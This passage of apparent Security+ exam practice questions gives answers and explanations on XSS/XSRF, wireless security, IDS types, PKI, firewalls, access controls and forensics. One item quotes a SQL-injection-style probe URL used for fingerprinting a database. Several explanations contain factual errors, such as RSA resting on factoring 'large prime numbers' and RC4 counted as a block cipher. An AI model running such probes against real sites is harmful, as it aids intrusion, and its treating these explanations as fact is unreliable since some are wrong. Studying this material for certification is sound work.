a classification of security devices that gather information from various sources. The information is then delivered to a correlation engine.SSL accelerators assist the processor-intensive activities associated with SSL/TLS encryption.Load balancers would be placed based on where they are needed. If it needs to balance the load among several web servers, the load balancer would be placed in the DMZ. If, however, there is high traffic associated with internal file servers, the load balancer would be better placed in the same network segment as the file servers. Taps (monitoring ports) and port mirrors allow for an IDS to examine network traffic. They should be placed in the appropriate network segment. SDN is a Software Defined Network and virtualizes the entire network, including the security devices.

What are the best ways for a web programmer to prevent website application code from being vulnerable to XSRF attacks? (Select the two best answers.)

Validate input on the client and the server side Restrict the use of special characters in form fields Input validation is extremely important when it comes to website attacks such as XSRF (cross-site request forgery) and cross-site scripting (XSS) attacks. Forms and other documents should be validated on the client side and the server side (if at all possible). Special characters should be restricted and sanitized within form fields and URLs. This is all part of secure coding. Using angle brackets for HTML code (for example < and >) is just good programming. Without angle brackets, the HTML statement won't work, but it has nothing to do with input validation. The more redirection that occurs, the more the chance of vulnerabilities being exploited. URL redirection should be limited if not eliminated. Web proxies make for more efficient web connections in a variety of ways but do nothing for input validation.

A programmer wants to prevent cross-site scripting. Which of the following should the programmer implement?

Validation of input to remove hypertext Cross-site scripting (XSS) is a vulnerability to web applications. For example, a malicious attacker might attempt to inject hypertext into a standard text-based web form. Shell scripts, batch files, and Java bit code are not associated with XSS attacks.

The IT director asks you to verify that the organization's virtualization technology is implemented securely. What should you do?

Verify that virtual machines have the latest updates and patches installed One of the most important security precautions you can take is to install the updates and patches. This concept applies to regular operating systems, applications, and virtual machines. It is unnecessary for virtual machines to be multihomed because this will not increase their security. In fact, the more network connections a VM has, the less security it has. Penetration testing should be completed before the virtual machines have been implemented. Subnetting is not necessary for virtual machines, although it can increase security. Subnetting should be taken into account during the planning and implementation stage.

You are configuring an 802.11n wireless network. You need to have the best combination of encryption and authorization. Which of the following options should you select?

WPA-Enterprise WPA-Enterprise offers a decent level of encryption (WPA) as well as a powerful means of authorization (Enterprise). Enterprise usually means you are using a separate RADIUS server, or something similar, to handle the authorization side of things and are not relying on the wireless device itself. Although WPA2-PSK offers a better level of encryption, it does not offer authorization the way an enterprise configuration does. The combination of WEP and 802.1X does offer a form of authorization, but WEP is deprecated and is not recommended in any scenario. Combining WPA and TKIP offers the same level of encryption as WPA-Enterprise but does not offer authorization.

Your boss has asked you to reduce an AP's power setting and place the AP in the center of your building. What reconnaissance method is your boss trying to prevent?

War-driving Your boss is trying to prevent war-driving. By streamlining your AP, you reduce the chance of a war-driver being able to access (or even "see") your wireless network. An evil twin is an AP put in place maliciously that has the same SSID as an already existing AP on your network. Rogue APs are access points that are not part of your wireless network. The above techniques in the scenario might reduce RF interference; however, RF interference is not a reconnaissance method.

Which of the following uses a binary key and is often combined with or incorporated into a symmetric algorithm because it is not secure when used by itself?

XOR EXclusive OR (XOR) uses a binary key to create a cipher text. By itself, XOR does not provide a high level of security. Consequently, it is used in combination with symmetric ciphers. Answer C is incorrect. RACE Integrity Primitives Evaluation Message Digest (RIPEMD) was based on MD4 and was replaced by RIPEMD-160 (160 bits). Newer versions are RIPEMD-256 and RIPEMD-320.Answer D is incorrect. ROTate 13 (ROT13) is a simple substitution cipher that replaces each letter with a letter 13 places further down the alphabet. For example, A becomes N, B becomes O, C becomes P, and so on.Answer A is incorrect. Substitution ciphers involve transposition (or substitution) of characters, and are older methodologies. They are now easily broken by a computer.

A security administrator for your organization utilized a heuristic system to detect an anomaly in a desktop computer's baseline. The admin was able to detect an attack even though the signature-based IDS and antivirus software did not detect it. Upon further review, it appears that the attacker had downloaded an executable file on the desktop computer from a USB port, and executed it triggering a privilege escalation. What type of attack has occurred?

Zero day A zero day attack (such as a zero day virus) is one that up until the point of time when the attack occurs was previously unknown to antivirus software companies and IDS companies. So, for the attack in question there was no AV or IDS signature available to detect it—it is an unknown and undocumented exploit. The admin found it by utilizing a heuristic system, which is a more advanced type of IDS. In a similar scenario, if a malicious exploit is found in an application and you inquire with the software vendor about remediation steps, and then find that no patches are available, you have most likely found a zero day attack. In these situations, you will have to improvise. The rest of the answers are known attacks. Directory traversal is a method of accessing unauthorized parent directories on web servers. XML injection is a type of code injection used on website forms. Baiting is a type of social engineering attack where a USB flash drive or other type of removable media (often containing malware) is left out in the open for an unsuspecting person to pick up and (hopefully) insert into a computer.

To which type of attack are password files stored on a server vulnerable?

a dictionary attack A dictionary attack is based on the attacker's efforts to determine the decryption key to defeat a cipher. This attack uses words from the dictionary and typically succeeds because many users choose passwords from a dictionary that are easy to remember. Therefore, the dictionary attack is a part of cryptanalysis. One-way encryption or one-way hashing protects against reading or modifying the password file, but an intruder can launch a dictionary attack after capturing the password file.Answer B is incorrect. A SYN flood attack is a Denial of Service (DoS) technique. The attacker sends multiple SYN packets to a target machine from a spoofed source IP address. The victim machine responds to the service requests by replying with an acknowledgement (SYN-ACK) and allocating resources to the spoofed source IP address. The target machine runs out of resources, and the requests from legitimate users are denied.Answer A is incorrect. In a side channel attack, the attacker gains information regarding the encryption algorithms running in the cryptosystem that is implemented in the network. The attacker can use information such as power consumption, electromagnetic radiations, and sound to break into a system. The side channel attack can also be based on the time taken to perform a computation.Answer D is incorrect. A DoS attack exploits the limitations of the TCP/IP protocol by flooding the network with a large number of false resource requests or by consuming the complete bandwidth of the network. To fulfill the resource requests that are falsely created by the attacker, the network exhausts its resources. Therefore, legitimate and authorized users are denied services on the basis of a resource crunch in the network.

You are the security administrator for your company. You identify a security risk. You decide to continue with the current security plan. However, you develop a contingency plan for if the security risk occurs. Which type of risk response strategy are you demonstrating?

acceptance You are demonstrating a risk response strategy of acceptance. Acceptance involves accepting the risk and leaving the security plan unchanged. Examples of acceptance would include taking no action at all or leaving the plan unchanged and developing a contingency or fallback plan.Answer B is incorrect. You are not demonstrating a risk response strategy of avoidance. Avoidance involves modifying the security plan to eliminate the risk or its impact. Examples of avoidance would include limiting the scope of security, adding security resources to eliminate the risk, or removing resources from a resource to eliminate the risk.Answer A is incorrect. You are not demonstrating a risk response strategy of mitigation. Mitigation involves reducing the probability or impact of a risk to an acceptable risk threshold. Examples of mitigation would include taking actions to minimize the probability of a risk.Answer D is incorrect. You are not demonstrating a risk response strategy of transference. Transference involves transferring the risk and its consequences to a third party. The third party is then responsible for owning and managing the risk. Purchasing insurance is an example of transference.

As a security administrator, you are responsible for ensuring that your organization's IT staff understands the security mechanisms employed on the network. You are currently documenting the security mechanisms as part of the IT training. During the documentation, you realize that many of the IT staff does not understand the basic terms used in IT security. You need to document the terms and definitions that you will use. What is a mathematical formula that is used in cryptography to encrypt data?

algorithm An algorithm is a mathematical formula that is used in cryptography to encrypt data by transforming plaintext into ciphertext. Plaintext, sometimes referred to as clear text, is information in its pre-encrypted form. Ciphertext is data in its post-encrypted form. A key is information that can be plugged into an encryption algorithm to either encrypt plaintext or decrypt ciphertext. Private keys are kept secret and are used in symmetric and asymmetric algorithms. Public keys are shared and used in asymmetric algorithms. The public key of the recipient is used to encrypt an e-mail message to ensure the message can only be read by its intended recipient. Public keys decrypt the hash of an electronic signature.

Which policy defines the sensitivity of a company's data?

an information policy An information policy defines the sensitivity of a company's data and the proper procedures for storage, transmission, disposal, and marking of a company's data. The cornerstone practice of a company's information policy, as with all security-related policies, is to grant only the level of access that is required to allow particular individuals to fulfill their responsibilities. Accordingly, a well-developed information policy will rely on information about separation of duties to establish different levels of access by group role or individual responsibility. Individuals will be granted access only to that information for which they have a 'need to know' to accomplish the goals of their position.Answers D, C, and B are incorrect. A backup policy defines the procedures that should be used to back up information stored on a company's network. A security policy defines the technical means that are used to protect data on a network. A use policy, sometimes referred to as an acceptable use policy, defines the manner in which employees are allowed to use a company's network equipment and resources, such as bandwidth, Internet access, and e-mail services.Policies contain conditions of expected performance and the consequences of non-compliance. An access control policy details guideline on the rights, privileges, and restrictions for using company equipment and assets.

Your company recently implemented an internal public key infrastructure (PKI). You need to ensure that all of the PKI components are secure and are currently researching the vulnerabilities on the entity that signs the certificates. Which entity are you examining?

an issuer In a public key infrastructure (PKI), an issuer is the entity that signs a certificate. Signing a certificate verifies that the name and key in the certificate are valid. PKI is a system designed to securely distribute public keys. A PKI typically consists of the following components: certificates, a key repository, a method for revoking certificates, and a method to evaluate a certificate chain, which security professionals can use to follow the possession of keys. Chain of custody might be used in proving legal cases against hackers.Answers C, D, and A are incorrect. A principal is any entity that possesses a public key. A verifier is an entity that verifies a public key chain. A subject is an entity that seeks to have a certificate validated. When using a PKI, keep the following points in mind: When encrypting a message with the public key, only the private key can decrypt it. When encrypting a message with the private key, only the public key can decrypt it.

Your company has decided to install multiple types of monitoring devices on your network. Which type of monitoring is most likely to produce a false alert?

anomaly-based Anomaly-based monitoring is most likely to produce a false alert. With anomaly-based monitoring, alerts occur where there are any deviations from normal behavior. Deviations from normal behavior will normally occur but are not always indications of a possible attack. With this type of monitoring, there is an initial learning period before anomalies can be detected. Once the baselines are established, anomaly-based monitoring can detect anomalies. Sometimes the baseline is established through a manual process. Answers B and D are incorrect. Misuse-detection-based monitoring is the same as signature-based monitoring. Signature-based monitoring is more likely to give you a false sense of security rather than a false alert. Signature-based monitoring relies upon a database that contains the identities of possible attacks. This database is known as the signature database. Signature-based monitoring watches for intrusions that match a known identity or signature. Signature-based monitoring requires that updates be regularly obtained to ensure effectiveness. Answer C is incorrect. Behavior-based monitoring is not likely to produce a false alert because you defined non-acceptable behavior. It is more susceptible to giving you a false sense of security. It is only as strong as the behaviors you have defined. If you do not properly define inappropriate behaviors, then attacks can occur. Behavior-based monitoring looks for behavior that is not allowed and acts accordingly. When you define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted, you are using behavior-based monitoring.

During a meeting, you present management with a list of the access controls used on your network. You explain that these controls include preventative, detective, and corrective controls. Which control is an example of a corrective control?

anti virus software Antivirus software is an example of a corrective technical control because it attempts to correct any damage that was inflicted during a security breach. Antivirus software can also be considered a compensative technical control.Answers A, D, and C are incorrect. Routers are examples of preventative technical controls because they prevent security breaches. Routers are a compensatory technical control. IDSs are a detective technical control and a compensative technical control.Audit logs are examples of detective technical controls because they detect security breaches. Audit logs are also a compensative technical control.There are three categories of access control: technical, administrative, and physical controls. A technical control is a control that is put into place to restrict access. Technical controls work to protect system access, network architecture and access, control zones, auditing, and encryption and protocols. An administrative or management control is a control that dictates how security policies are implemented to fulfill the company's security goals. Administrative controls include policies and procedures, personnel controls, supervisory structure, security training, and testing. A physical or operational control is a control that is implemented to secure physical access to an object, such as a building, a room, or a computer. Physical controls include network segregation, perimeter security, computer controls, work area separation, backups, and cabling.The three access control categories provide seven different functionalities or types: preventative - A preventative control prevents security breaches. detective - A detective control detects security breaches as they occur corrective - A corrective control restores control and attempts to correct any damage that was inflicted during a security breach. deterrent - A deterrent control deters potentials violations. recovery - A recovery control restores resources. compensative - A compensative control provides an alternative control if another control may be too expensive. All controls are generally considered compensative. directive - A directive control provides mandatory controls based on regulations or environmental requirements. Each category of control includes controls that provide different functions. For example, a fence is both a deterrent physical control and a compensative physical control. Monitoring and supervising are both a detective administrative control and a compensative administrative control.

Which of these requirements would indicate that you needed to install a router as opposed to an NIPS/NIDS?

anti-spoofing Anti-spoofing is a router function, where an application compares the incoming or outgoing IP address to an ACL. Other types of anti-spoofing perform similar functions on MAC addresses or switch ports. A NIDS or NIPS would not check IP address traffic for spoofing.Answers C, B, and A are incorrect. Inline vs. passive are installation decisions are made when you choose between a network-based intrusion prevention system (NIPS) and a network-based intrusion detection system (NIDS). An NIPS is an active device that monitors and reacts to network intrusions. An NIDS is a passive device that only provides notification in the event of a security breach. In-band or out-of-band would also indicate a decision between an NIDS or NIPS. In-band management of an NIDS/NIPS would refer to local management, whereas out-of-band management would be performed remotely. Rules define what an NIDS/NIPS monitors with regard to incoming network traffic.

You are researching the different types of firewalls that you can install to protect your company's network and assets. Which type of firewall is most detrimental to network performance?

application-level proxy firewall An application-level proxy firewall is most detrimental to network performance because it requires more processing per packet.The packet-filtering firewall provides high performance. Stateful and circuit-level proxy firewalls, while slower than packet-filtering firewalls, offer better performance than application-level firewalls.Kernel proxy firewalls offer better performance than application-level firewalls. This type of firewall is a firewall that is built into the operating system kernel.An application-level firewall creates a virtual circuit between the firewall clients. Each protocol has its own dedicated portion of the firewall that is concerned only with how to properly filter that protocol's data. Unlike a circuit-level firewall, an application-level firewall does not examine the IP address and port of the data packet. Often these types of firewalls are implemented as a proxy server. A proxy-based firewall provides greater network isolation than a stateful firewall. A stateful firewall provides greater throughput and performance than a proxy-based firewall. In addition, a stateful firewall provides some dynamic rule configuration with the use of the state table.Stateless firewalls make decisions based on the data that comes in and not on any complex rules. Stateful firewalls maintain a state table that tracks every communication packet.

You need to ensure that your company's anti-virus application protects against viruses that include protective code that prevents outside examination of critical elements. Which type of virus is this?

armored virus An armored virus includes protective code that prevents examination of critical elements, such as scans by anti-virus software. The armor attempts to make it difficult to destroy the virus. An armored virus is difficult to reverse engineer. Answer C is incorrect. A companion virus attaches to legitimate programs and creates a program with a different file extension. When the user attempts to access the legitimate program, the companion virus executes in place of the legitimate program. Answer D is incorrect. A phage virus modifies other programs and databases. The only way to remove the virus is to reinstall the infected applications. Answer A is incorrect. A stealth virus prevents detection by hiding from applications. It may report a different file size than the actual file size as a method of preventing detection.

You have been asked to research the encryption algorithms available and make recommendations to management about which to implement. One of the encryption algorithms that you are researching is RSA. Which type of encryption algorithm does this algorithm represent?

asymmetric with authentication RSA is an example of asymmetric cryptography with authentication. RSA is used as the worldwide de facto standard for digital signatures. RSA is a public key algorithm that provides both encryption and authentication. It relies on the hacker's inability to factor large prime numbers.Asymmetric algorithms include Diffie-Hellman, RSA, ElGamal, Elliptic Curve Cryptosystem (ECC), CAST, and Knapsack.Symmetric algorithms include Data Encryption Standard (DES), Triple DES (3DES), Advanced Encryption Standard (AES), International Data Encryption Algorithm (IDEA), Blowfish, RC4, RC5, and RC6. Symmetric algorithms are sometimes called block ciphers.RSA does not deal with discrete logarithms. The security that RSA provides is based on the use of large prime numbers for encryption and decryption. It is difficult to factor large prime numbers. Therefore, it is difficult to break the encryption. RSA can prevent man-in-the-middle attacks by providing authentication before the exchange of public and private keys. The key is securely passed to the receiving machine. Therefore, public key cryptography is preferably used to secure fax messages. RSA requires higher processing power due to the factorability of its numbers, but provides efficient key management.

You have just installed a new FTP server, but you do not know what information the FTP server is transmitting when a user initially connects to it. Which tool could you use to discover that information, and consequently know what information an attacker could exploit?

banner grabbing A network administrator could use banner grabbing to identify information to circumvent that exploit. Banner grabbing intercepts a text file sent by a server or a host. The text file includes OS information and in the case of a web server, perhaps the basic configuration info. The attacker can then exploit that information. Answers B, A, and D are incorrect. Backup utilities are critical components of network security. Whatever utility you deploy should allow for secure automation. Passive scanners do not directly interact with the network. An example would be scanning a company's website. Active scanners use tools like Nessus and Microsoft Baseline Security Analyzer that analyze the network itself. When comparing passive scans to active, passive scans are indirect, typically looking at sites that provide information, and active scans look at the actual network equipment. An active scan is also considered an intrusive scan, and usually provides more meaningful results.

You have just been hired as the systems administrator for a research and development firm. Your organization allows the employees to use social media at work. What particular concern should you voice to management?

data exfiltrations You should voice your concern over data exfiltration. It would be very easy for a picture of something confidential to be posted to a social media site or for someone to discuss a new intellectual property project in a public forum. None of the other concerns would be affected by employee use of social media.Answers D, C, and B are incorrect. Content filters on firewalls and routers must be configured properly. Proper configuration is often an iterative process, blocking undesirable traffic while allowing appropriate traffic. Access points must also be configured properly. Wireless networks have their own security issues, but none that are affected by social media. Weak security configurations can arise from neglecting to implement a specific security device, or not configuring security settings properly.

You are creating an IDS solution for your company's network. You define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted. Which type of IDS are you using?

behavior-based A behavior-based IDS looks for behavior that is not allowed and acts accordingly. When you define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted, you are using behavior-based monitoring. Answers C and A are incorrect. A misuse-detection-based IDS is the same as signature-based monitoring. A signature-based IDS requires that updates be regularly obtained to ensure effectiveness. Signature-based monitoring watches for intrusions that match a known identity or signature when checked against a database that contains the identities of possible attacks. This database is known as the signature database.Answer D is incorrect. An anomaly-based IDS detects any changes or deviations in network traffic. With this type of monitoring, there is an initial learning period before anomalies can be detected. Once the baselines are established, anomaly-based monitoring can detect anomalous behavior. Sometimes the baseline is established through a manual process.Another type of IDS that you need to understand is a heuristic IDS. This type of monitoring uses artificial intelligence (AI) to detect intrusions. Analytics are performed on the actions taken, and the IDS acts based on the logic in the AI. False positives and false negatives are possible in a heuristic IDS. However, the AI is capable of learning if administrators notify the system when false positives and false negatives occur.

You have been hired as a security consultant by a real estate agency. The company currently implements discretionary access control (DAC) on its network. Who is primarily responsible for determining access control using this access control model?

data owner The data owner is primarily responsible for determining access control using discretionary access control (DAC).None of the other options is correct. None of the other persons named has any primary responsibilities when using DAC. Using mandatory access control (MAC), the security label assigned to subjects and objects is primarily responsible for determining access control. This security label is defined for each subject and object based on strict rules. Using role-based access control (RBAC), the security administrator is primarily responsible for determining access control based on the roles defined and the written security policy.

You are responsible for managing your company's virtualization environment. Which feature should NOT be allowed on a virtualization host?

browsing the internet You should not allow Internet browsing on a virtualization host. This can present a possible security breach through the introduction of spyware or malware. Anything that affects a virtualization host also affects all virtual computers on the host. Virtual servers have the same information security requirements as physical servers.Answers D, C, and B are incorrect. You should implement IPsec, implement a firewall, and monitor the event logs of a virtualization host. IPsec helps by encrypting data as it transmits across the network. Firewalls prevent unauthorized access to a physical or virtual computer. Event logs help administrators detect security breaches that have occurred or that are being attempted.

How does an unsigned Java applet enforce security in JDK 1.1?

by using sandboxes Unsigned Java applets in Java Development Kit 1.1 use sandboxes to enforce security. A sandbox is a security scheme that prevents Java applets from accessing unauthorized areas on a user's computer. This mechanism protects the system from malicious software, such as hostile applets, by enforcing the execution of the application within the sandbox and preventing access to the system resources outside the sandbox. The concept of a Web script that runs in its own environment and cannot interfere with any other process is known as a sandbox.A hostile applet is an active content module used to exploit system resources. Hostile applets coded in Java can pose a security threat to computer systems if the executables are downloaded from unauthorized sources. Hostile applets may disrupt the computer system operation, either through resource consumption or through covert channels. Answer A is incorrect. Object code refers to a version of a computer program that is compiled before it is ready to run in a computer. The application software on a system is typically in the form of compiled object codes and does not include the source code. Object codes are not related to the security aspects of Java. They represent an application program after the compilation process.Answer D is incorrect. Macro programs use macro languages. Macro languages, such as Visual Basic, are typically used to automate the common tasks and activities of application users. Macro programs have their own set of security vulnerabilities, such as macro viruses, but are not related to Java security.Answer C is incorrect. Digital and trust certificates are used by Microsoft's ActiveX technology to enforce security. ActiveX refers to a set of controls that users can download in the form of a plug-in to enhance a feature of an application. The primary difference between Java applets and ActiveX controls is that the ActiveX controls are downloaded subject to acceptance by a user. The ActiveX trust certificate also states the source of the plug-in signatures of the ActiveX modules. Java applets are short programs that use the technique of a sandbox to limit the applet's access to specific resources stored in the system.The term sandbox is also used to describe a test environment that is completely isolated from the rest of the network. It allows you to test new patches or applications prior to deployment in live systems.

You are considering cloud services, and you concerned about the interaction of your security policies and those of the hosting provider. What can alleviate your concern?

cloud access security brokers Cloud access security brokers would alleviate your concern because they enforce security policies, whether on-premises or cloud-based. They often sit between the cloud service users and providers, merging the security policies of the user and the provider. Answer D is incorrect. Virtual desktop infrastructure (VDI) creates a user desktop on a virtual machine that is hosted on a data center server. Desktops can be personalized while still having centralized management and security. Virtual desktop environment (VDE) maintains everything related to the user desktop, and deploys them to the host. Virtual desktop infrastructure can make your desktops either more secure or less so. Storing data on VDI servers in the data center is more secure than storing it locally on the user's machine. Also, administrators have greater control over desktop and app distribution in a VDI environment.Answer A is incorrect. VM escape protection can be accomplished by sandboxing. If the virtual application crashes, sandboxing allows you to contain the data and not allow the information to "escape" into another application. VM escape occurs a vulnerability in the operating system running in the virtual machine is exploited. When this occurs, it allows an attacker to run malicious code and escape the boundaries of the VM.Answer B is incorrect. Stress testing puts a load on the system much higher than what is normally expected. For example, testing a website with 100x the normal amount of traffic would identify how the system will respond to the stress. Stress testing does not reveal security weaknesses between the interactions of your security policies with those of the hosting provider.Choosing between an on-premises solution versus a hosted solution versus a cloud solution are all virtualization decisions. On-premises virtual machines (VMs) are stored at your physical location. The hosted model allows you to contract with a third party for virtual access, and the responsibilities of the third party are detailed in a service level agreement (SLA). Cloud systems, while closely related to hosted models, have requirements such as on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service, as defined by NIST.

Which attack involves changing a text file in which a Web server stores persistent setting?

cookie poisoning A Web server stores persistent setting on a Web client in a text file called a cookie. In the case of cookie poisoning, a cookie is changed to modify persistent data or the user that is associated with the cookie. Answer A is incorrect. With cross-site scripting (XSS), a script on a Web site, such as a JavaScript, is configured to manipulate a computer other than the Web server. Answer D is incorrect. With active content inserting, a program, such as a Java Applet, is inserted into a Web page. Answer C is incorrect. With site spoofing, a Web client is tricked into believing that one Web site is being accessed, when in fact another Web site is being accessed.

You need to ensure that a set of users can access information regarding departmental expenses. However, each user should only be able to view the expenses for the department in which they work. Senior managers should be able to view the expenses for all departments. Which database security feature provides this granular access control?

database view The database security feature that provides this granular access control are database views. Database views are used to limit user and group access to certain information based on the user privileges and the need to know. Views can be used to restrict information based on group membership, user rights, and security labels. Views implement least privilege and need-to-know and provide content-dependent access restrictions. Views do not provide referential integrity, which is provided by constraints or rules.Answer D is incorrect. A save point does not provide granular access control. Save points ensure data integrity and availability but are not a database security feature. Save points are used to ensure that a database can return to a point when the system crashes. This further ensures the availability of the data prior to the database failure. Save points can be initiated either at a scheduled time or by a user action during data processing. Database integrity can also be provided through the implementation of referential integrity, where all the foreign keys reference the existing primary keys to identify the resource records in a table. Referential integrity requires that for any foreign key attribute, the referenced relation must have a tuple with the same value for its primary key.Answer A is incorrect. Partitioning does not provide granular access control. Partitioning is another protection technique of ensuring database security. Partitioning involves splitting the database into many parts. Partitioning makes it difficult for an intruder to collect and combine confidential information and deduce relevant facts. Noise and perturbation do not provide granular access control. The noise and perturbation technique deploy the insertion of bogus data to mislead attackers and protect database confidentiality and integrity. Answer B is incorrect. The noise and perturbation technique involve inserting randomized bogus information along with valid records of the database. This technique alters the data but allows the users to access relevant information from the database. This technique creates enough confusion for the attacker to extract confidential information.Database views are an example of content-dependent access control in which the access control is based on the sensitivity of information and the user privileges granted. This leads to a higher overhead in terms of processing because the data is granularly controlled by the content and the privileges of users. Database views can limit user access to portions of data instead of to the entire database. For example, during database processing in an organization, a department manager might have access only to the data of employees belonging to that department.

You have just discovered that an application that your company purchased is intentionally embedded with software code that allows a developer to bypass the regular access and authentication mechanisms. Which software code is being described?

debugging hooks A debugging or maintenance hook is software code that is intentionally embedded in the software during its development process to allow the developer to bypass the regular access and authentication mechanisms. These hooks can pose a threat to the security of the software and can be exploited if any maintenance hook is not removed before the software goes into production and an intruder is able to find the maintenance hook.Answer C is incorrect. A logic bomb implies a malicious program that remains dormant and is triggered following a specific action by the user or after a certain time interval. The primary difference between logic bombs, viruses, and worms is that a logic bomb is triggered when specific conditions are met.Answer D is incorrect. A pseudo-flaw refers to vulnerability code embedded intentionally in the software to trap intruders. Answer A is incorrect. A multipart virus can infect both executable files and boot sectors of hard disk drives. The virus first resides in the memory and then infects the boot sector and the executable files of the computer.

Your LAN is isolated from the Internet by a perimeter network. You suspect that someone is trying to gather information about your LAN. The IT director asks you to gather as much information about the attacker as possible while preventing the attacker from knowing that the attempt has been detected. What is the best method to accomplish this?

deploy a honeypot in the perimeter network A honeypot can be used to lure attackers in and trap them while you analyze their methods. The honeypot is usually placed within the perimeter network, which is the DMZ. Proxy servers are usually not placed in the perimeter network; they act as go-betweens, or mediators, for users on the LAN and servers on the Internet. A NIPS (network intrusion prevention system) can be placed in or out of a perimeter network, but it does not lure in attackers; instead, a NIPS attempts to prevent attacks from happening.

Your client is developing a new website. The web administrator has indicated that she would like to use a low-cost certificate to offer Transport Layer Security (TLS) to the new domain. What type of certificate should you recommend?

domain validation Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name.Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates provide a higher level of trust than domain validation and require the most effort by the CA to validate. They are validated using more information than just the domain. Extended validation certificates require much more effort to deploy than domain validation certificates.Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Wildcard certificates allow you to create a certificate in a domain, and use that same certificate for multiple subdomains. For example, if you had mail.mysite.com, ftp.mysite.com, and www.mysite.com, you could issue a wildcard certificate for mysite.com, and have it cover all the subdomains. Without the wildcard certificate, you would have to issue a certificate for each subdomain.

A hacker has used a design flaw in an application to obtain unauthorized access to the application. Which type of attack has occurred?

escalation of privileges An escalation of privileges attack occurs when an attacker has used a design flaw in an application to obtain unauthorized access to the application. There are two type of privilege escalation: vertical and horizontal. With vertical privilege escalation, the attacker obtains higher privileges by performing operations that allow the attacker to run unauthorized code. With horizontal privilege escalation, the attacker obtains the same level of permissions as he already has but uses a different user account to do so.Answers B and D are incorrect. A backdoor is a term for lines of code that are inserted into an application to allow developers to enter the application and bypass the security mechanisms. Backdoors are also referred to as maintenance hooks.Answer A is incorrect. A buffer overflow occurs when an application erroneously allows an invalid amount of input in the buffer.

E-commerce payment systems, like PayPal and Google Checkout, allow the user to use a single identity across multiple platforms. Of which identity and access service is that an example?

federation Federation and federated identity is the ability of a user to use a single identity across multiple businesses or networks. Federation differs from single sign-on, where a user has one password that grants access to all the permitted network resources. Federation relies on trust relationships that are established between the different businesses or networks. Another example of federated identity is allowing Microsoft users to sign in to cloud services using their on-premises Active Directory domain credentials.A transitive trust involves creating relationships between domains to grant authenticated users access to other domains. In Active Directory, for example, if the Sales domain trusts the Marketing domain, and the Marketing domain trusts the HR domain, then Sales trusts the HR domain through a transitive relationship. Transitive trusts are established within a single organization or between private organizations. PayPal and Google Checkout do not use transitive trusts.Biometrics and keyboard cadence are both factors used in multi-factor authentication. Biometrics is something you are. Fingerprints, voiceprints, retina scans, and iris scans are all examples of biometrics. Keyboard cadence is an example of something you do. When the user enters a new password, the keystroke timing (cadence) is recorded as a signature pattern. Authentication factors may be part of the process of authenticating to your identity, but it has nothing to do with authorizing the identity to access multiple businesses or networks.For the Security+ exam, you must understand the following authentication factors: something you are, something you have, something you know, somewhere you are, and something you do.Something you have is based on the user possessing some type of security device. These can include things such as smart cards, tokens, and key fobs. Something you know would be a password, a PIN, the name of a childhood sweetheart, the color of your first car, or the answer to a similar question.

You are a security tester for a penetration testing security company. You are currently testing a website and you perform the following manual query:http://www.davidlprowse.com/cookies.jsp?products=5%20and%201=1The following response is received in the payload:"ORA-000001: SQL command not properly ended"Based on the query and the response, what technique are you employing?

fingerprinting The technique being used here is fingerprinting, which is used to find out information about a system. It can be done passively by sniffing packets between hosts, or actively by sending special packets to a target and analyzing the responses. It can be done by scanning ports, or by using commands in a browser's URL bar as is the case in this scenario. By adding syntax to the end of a domain, you can "test" the web server and ascertain information about it based on the results. In this case, we see "ORA-000001: SQL command not properly ended" is the result. This tells us that the website is running an Oracle database (a relational SQL-oriented database). From there an attacker could limit attack techniques to that particular type of server, saving time. Now, if you were to run that actual syntax against my website, you would not see anything about Oracle, but you might get a 404 Not Found error. Underneath it would tell you that the server is running Apache web server software, OpenSSL, and more. Unless, that is, we improved upon our input validation and secure coding concepts, which is exactly why these tests are performed—to uncover these vulnerabilities. Cross-site scripting (XSS) exploits the trust a user's browser has in a website through code injection, often in web forms, but not in the URL bar. SQL injection is a type of code injection when user input in database web forms is not filtered correctly and is executed improperly. Privilege escalation is the act of exploiting a bug or design flaw in a software or firmware application to gain access to resources that normally would've been protected from an application or user. Remote code execution (RCE) is when an attacker obtains control of a target computer through some sort of vulnerability. Finally, a zero day attack is one that is executed on a vulnerability in software before that vulnerability is known to the creator. Unfortunately, as a security administrator, you are expected to be able to predict the future to a certain extent, and protect against the unknown. Don't worry though, the more experienced you get, the easier this becomes!

You are about to begin a forensic investigation. Which of the following is NOT part of the investigation?

follow the incident response plan Following an incident response plan is NOT part of an investigation. An incident response plan describes how to respond to various types of security incidents, but it is not part of the forensic investigation. All of the other options are part of an investigation.You should capture a system image to take a "snapshot" of the system at the time you begin the investigation. This will preserve the state of the system at the time. The system image can be examined later. Network traffic and logs should be analyzed. Variations in baselines can indicate repeated attacks, and password hack attempts would show up in the logs. You should also capture video of the scene. Video records a series of individual frames, which can be tagged to help identify points of interest. The video should also indicate the location, date, time and the person who recorded the video. This step is referred to as active logging.An investigation also involves recording the time offset, taking hashes and screenshots, and completing witness interviews. You should record time offset of the videos and all devices. It is not uncommon for a time to be off by a few seconds or even minutes. It is critical that you are able to trace events across multiple workstations and devices. You can add an entry into the log of a machine with the incorrect time to show the difference between the recorded time and the actual time. The time offset for every device and video that is captured must be recorded so that all evidence can be synched. You should take hashes of any digital evidence collected. This hash can then be compared to a hash that is calculated at a later date to ensure that the digital evidence has not been modified in any way. If the hash values are the same, the integrity of the digital evidence is verified. Screenshots allow you to record the information displayed on a computer screen or a smartphone. If the computer is powered down, whatever is on the screen would be lost without a screenshot. Witness interviews are an element of forensic investigation. It is important to talk to witness as early as possible after an incident. As time passes, recollections may change, and details may be forgotten. If at all possible, you should use some type of electronic recording system to document the interview. This is referred to as intelligence gathering.In summary, the rules for forensic investigation are: Follow order of volatility rules. Capture a system image. Get copies of both a network traffic capture and logs. Ensure that the correct record time offset is obtained to ensure that any recordings can be calibrated together. Takes hashes of all files and images. Record the appropriate screenshots. Record any witnesses, including contact information. Keep track of man hours and expense involved in the forensic process. Obtain and preserve any video capture that exists, including computer video and CCTV. Perform big data analysis.

What type of documentation includes rules for ISO compliance, adhering to NIST guidelines, and conforming to PCI-DSS and other standards?

